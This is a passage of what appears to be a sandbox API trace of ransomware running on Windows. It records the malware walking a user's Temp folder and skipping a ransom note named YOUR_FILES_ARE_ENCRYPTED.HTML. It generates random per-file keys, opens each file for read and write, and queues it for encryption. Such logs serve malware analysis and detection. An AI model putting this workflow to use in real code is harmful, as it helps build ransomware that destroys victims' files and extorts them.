ftLastWriteTime.dwLowDateTime=0x3a19fc40, ftLastWriteTime.dwHighDateTime=0x1d70172, nFileSizeHigh=0x0, nFileSizeLow=0x1063b, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="wemF6vuzEv.ods", cAlternateFileName="WEMF6V~1.ODS")) returned 1 [0122.194] StrStrIW (lpFirst="wemF6vuzEv.ods", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.194] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\wemF6vuzEv.ods") returned 59 [0122.194] PathFindExtensionW (pszPath="wemF6vuzEv.ods") returned=".ods" [0122.194] lstrlenW (lpString=".ods") returned 4 [0122.194] PathFindExtensionW (pszPath="wemF6vuzEv.ods") returned=".ods" [0122.194] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0122.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\wemF6vuzEv.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\wemf6vuzev.ods"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0122.195] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=67131) returned 1 [0122.195] GetProcessHeap () returned 0x600000 [0122.195] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0122.196] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="13") returned 2 [0122.196] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="E7") returned 2 [0122.196] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="CE") returned 2 [0122.196] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="8B") returned 2 [0122.196] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="FD") returned 2 [0122.196] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="37") returned 2 [0122.196] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="9C") returned 2 [0122.196] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="CF") returned 2 [0122.196] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="8F") returned 2 [0122.196] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="25") returned 2 [0122.196] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="F4") returned 2 [0122.197] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="9C") returned 2 [0122.197] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="B4") returned 2 [0122.197] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="81") returned 2 [0122.197] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="E4") returned 2 [0122.197] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="D0") returned 2 [0122.197] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="50") returned 2 [0122.197] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="B7") returned 2 [0122.197] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="10") returned 2 [0122.197] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="7E") returned 2 [0122.197] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="05") returned 2 [0122.197] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="E7") returned 2 [0122.197] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="55") returned 2 [0122.197] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="0A") returned 2 [0122.197] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="4D") returned 2 [0122.197] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="EC") returned 2 [0122.197] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="6C") returned 2 [0122.197] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="B1") returned 2 [0122.197] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="A6") returned 2 [0122.197] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="EA") returned 2 [0122.197] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="71") returned 2 [0122.197] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="10") returned 2 [0122.198] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\wemF6vuzEv.ods" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\wemF6vuzEv.ods") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\wemF6vuzEv.ods" [0122.198] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.198] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0122.203] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9d71230, ftCreationTime.dwHighDateTime=0x1d707ac, ftLastAccessTime.dwLowDateTime=0x2ccd0970, ftLastAccessTime.dwHighDateTime=0x1d709be, ftLastWriteTime.dwLowDateTime=0x2ccd0970, ftLastWriteTime.dwHighDateTime=0x1d709be, nFileSizeHigh=0x0, nFileSizeLow=0xae6, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="wWUKpJTZ1mfccuF.jpg", cAlternateFileName="WWUKPJ~1.JPG")) returned 1 [0122.203] StrStrIW (lpFirst="wWUKpJTZ1mfccuF.jpg", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.203] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\wWUKpJTZ1mfccuF.jpg") returned 64 [0122.203] PathFindExtensionW (pszPath="wWUKpJTZ1mfccuF.jpg") returned=".jpg" [0122.203] lstrlenW (lpString=".jpg") returned 4 [0122.203] PathFindExtensionW (pszPath="wWUKpJTZ1mfccuF.jpg") returned=".jpg" [0122.203] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0122.203] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\wWUKpJTZ1mfccuF.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\wwukpjtz1mfccuf.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0122.204] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=2790) returned 1 [0122.204] GetProcessHeap () returned 0x600000 [0122.204] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0122.204] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="BB") returned 2 [0122.205] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="90") returned 2 [0122.205] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="39") returned 2 [0122.205] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="DF") returned 2 [0122.205] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="14") returned 2 [0122.205] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="59") returned 2 [0122.205] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="50") returned 2 [0122.205] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="10") returned 2 [0122.205] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="84") returned 2 [0122.205] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="9D") returned 2 [0122.205] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="31") returned 2 [0122.205] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="27") returned 2 [0122.205] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="95") returned 2 [0122.205] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="F4") returned 2 [0122.205] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="C7") returned 2 [0122.205] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="B7") returned 2 [0122.205] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="BD") returned 2 [0122.205] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="61") returned 2 [0122.205] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="03") returned 2 [0122.205] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="CE") returned 2 [0122.205] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="D9") returned 2 [0122.205] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="3F") returned 2 [0122.205] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="C7") returned 2 [0122.205] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="FF") returned 2 [0122.205] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="23") returned 2 [0122.205] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="33") returned 2 [0122.205] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="D9") returned 2 [0122.205] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="1F") returned 2 [0122.205] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="05") returned 2 [0122.205] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="FB") returned 2 [0122.205] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="C8") returned 2 [0122.205] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="56") returned 2 [0122.206] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\wWUKpJTZ1mfccuF.jpg" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\wWUKpJTZ1mfccuF.jpg") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\wWUKpJTZ1mfccuF.jpg" [0122.206] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.206] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0122.212] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fcb2c10, ftCreationTime.dwHighDateTime=0x1d6fbcc, ftLastAccessTime.dwLowDateTime=0xfac71fa0, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xfac71fa0, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x10524, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="XwfQhMTHg8q.m4a", cAlternateFileName="XWFQHM~1.M4A")) returned 1 [0122.212] StrStrIW (lpFirst="XwfQhMTHg8q.m4a", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.212] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\XwfQhMTHg8q.m4a") returned 60 [0122.212] PathFindExtensionW (pszPath="XwfQhMTHg8q.m4a") returned=".m4a" [0122.212] lstrlenW (lpString=".m4a") returned 4 [0122.212] PathFindExtensionW (pszPath="XwfQhMTHg8q.m4a") returned=".m4a" [0122.212] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0122.212] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\XwfQhMTHg8q.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\xwfqhmthg8q.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0122.213] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=66852) returned 1 [0122.213] GetProcessHeap () returned 0x600000 [0122.213] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0122.214] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="41") returned 2 [0122.214] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="F9") returned 2 [0122.214] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="B3") returned 2 [0122.214] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="A4") returned 2 [0122.214] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="81") returned 2 [0122.214] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="E9") returned 2 [0122.214] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="F5") returned 2 [0122.214] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="67") returned 2 [0122.214] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="8C") returned 2 [0122.214] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="8B") returned 2 [0122.215] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="7F") returned 2 [0122.215] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="B6") returned 2 [0122.215] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="07") returned 2 [0122.215] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="E8") returned 2 [0122.215] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="4D") returned 2 [0122.215] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="E4") returned 2 [0122.215] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="E6") returned 2 [0122.215] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="F2") returned 2 [0122.215] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="9B") returned 2 [0122.215] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="7D") returned 2 [0122.215] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="45") returned 2 [0122.215] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="66") returned 2 [0122.215] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="0F") returned 2 [0122.215] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="0B") returned 2 [0122.215] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="99") returned 2 [0122.215] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="9F") returned 2 [0122.215] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="30") returned 2 [0122.215] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="25") returned 2 [0122.215] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="B7") returned 2 [0122.215] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="DD") returned 2 [0122.215] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="A8") returned 2 [0122.215] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="1B") returned 2 [0122.216] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\XwfQhMTHg8q.m4a" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\XwfQhMTHg8q.m4a") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\XwfQhMTHg8q.m4a" [0122.216] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.216] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0122.220] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7ed2660, ftCreationTime.dwHighDateTime=0x1d70607, ftLastAccessTime.dwLowDateTime=0xdff88740, ftLastAccessTime.dwHighDateTime=0x1d70833, ftLastWriteTime.dwLowDateTime=0xdff88740, ftLastWriteTime.dwHighDateTime=0x1d70833, nFileSizeHigh=0x0, nFileSizeLow=0x1de1, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="za8fs-W9_GC6qVPSM.jpg", cAlternateFileName="ZA8FS-~1.JPG")) returned 1 [0122.220] StrStrIW (lpFirst="za8fs-W9_GC6qVPSM.jpg", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.220] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\za8fs-W9_GC6qVPSM.jpg") returned 66 [0122.220] PathFindExtensionW (pszPath="za8fs-W9_GC6qVPSM.jpg") returned=".jpg" [0122.220] lstrlenW (lpString=".jpg") returned 4 [0122.220] PathFindExtensionW (pszPath="za8fs-W9_GC6qVPSM.jpg") returned=".jpg" [0122.220] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0122.220] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\za8fs-W9_GC6qVPSM.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\za8fs-w9_gc6qvpsm.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0122.221] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=7649) returned 1 [0122.221] GetProcessHeap () returned 0x600000 [0122.221] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0122.222] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="D8") returned 2 [0122.222] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="2D") returned 2 [0122.222] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="74") returned 2 [0122.222] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="4E") returned 2 [0122.222] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="00") returned 2 [0122.222] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="45") returned 2 [0122.222] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="C4") returned 2 [0122.222] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="12") returned 2 [0122.222] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="3B") returned 2 [0122.222] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="E7") returned 2 [0122.222] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="F8") returned 2 [0122.222] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="86") returned 2 [0122.222] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="7F") returned 2 [0122.222] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="18") returned 2 [0122.222] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="15") returned 2 [0122.222] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="14") returned 2 [0122.222] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="CC") returned 2 [0122.222] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="CF") returned 2 [0122.222] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="D0") returned 2 [0122.222] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="5A") returned 2 [0122.222] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="94") returned 2 [0122.222] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="0A") returned 2 [0122.222] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="7B") returned 2 [0122.222] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="07") returned 2 [0122.223] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="42") returned 2 [0122.223] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="59") returned 2 [0122.223] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="A6") returned 2 [0122.223] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="A2") returned 2 [0122.223] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="1A") returned 2 [0122.223] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="BD") returned 2 [0122.223] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="8D") returned 2 [0122.223] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="44") returned 2 [0122.223] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\za8fs-W9_GC6qVPSM.jpg" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\za8fs-W9_GC6qVPSM.jpg") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\za8fs-W9_GC6qVPSM.jpg" [0122.223] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.223] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0122.226] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f2231f0, ftCreationTime.dwHighDateTime=0x1d70332, ftLastAccessTime.dwLowDateTime=0xe60c3550, ftLastAccessTime.dwHighDateTime=0x1d706c6, ftLastWriteTime.dwLowDateTime=0xe60c3550, ftLastWriteTime.dwHighDateTime=0x1d706c6, nFileSizeHigh=0x0, nFileSizeLow=0x58d, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="zMcGN_sgZ7.avi", cAlternateFileName="ZMCGN_~1.AVI")) returned 1 [0122.226] StrStrIW (lpFirst="zMcGN_sgZ7.avi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.226] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\zMcGN_sgZ7.avi") returned 59 [0122.226] PathFindExtensionW (pszPath="zMcGN_sgZ7.avi") returned=".avi" [0122.226] lstrlenW (lpString=".avi") returned 4 [0122.226] PathFindExtensionW (pszPath="zMcGN_sgZ7.avi") returned=".avi" [0122.226] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0122.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\zMcGN_sgZ7.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\zmcgn_sgz7.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0122.253] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=1421) returned 1 [0122.253] GetProcessHeap () returned 0x600000 [0122.253] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0122.254] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="6F") returned 2 [0122.254] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="37") returned 2 [0122.254] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="85") returned 2 [0122.254] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="21") returned 2 [0122.254] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="12") returned 2 [0122.254] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="64") returned 2 [0122.254] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="DD") returned 2 [0122.254] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="E3") returned 2 [0122.254] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="29") returned 2 [0122.254] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="8B") returned 2 [0122.254] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="A6") returned 2 [0122.254] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="23") returned 2 [0122.254] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="36") returned 2 [0122.254] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="29") returned 2 [0122.254] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="97") returned 2 [0122.254] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="0C") returned 2 [0122.254] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="D2") returned 2 [0122.254] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="04") returned 2 [0122.254] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="A5") returned 2 [0122.254] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="54") returned 2 [0122.254] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="62") returned 2 [0122.254] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="A8") returned 2 [0122.254] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="61") returned 2 [0122.254] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="6F") returned 2 [0122.255] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="66") returned 2 [0122.255] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="AB") returned 2 [0122.255] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="27") returned 2 [0122.255] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="C6") returned 2 [0122.255] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="94") returned 2 [0122.255] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="DC") returned 2 [0122.255] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="27") returned 2 [0122.255] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="32") returned 2 [0122.256] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\zMcGN_sgZ7.avi" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\zMcGN_sgZ7.avi") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\zMcGN_sgZ7.avi" [0122.256] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.256] PostQueuedCompletionStatus (CompletionPort=0x274, 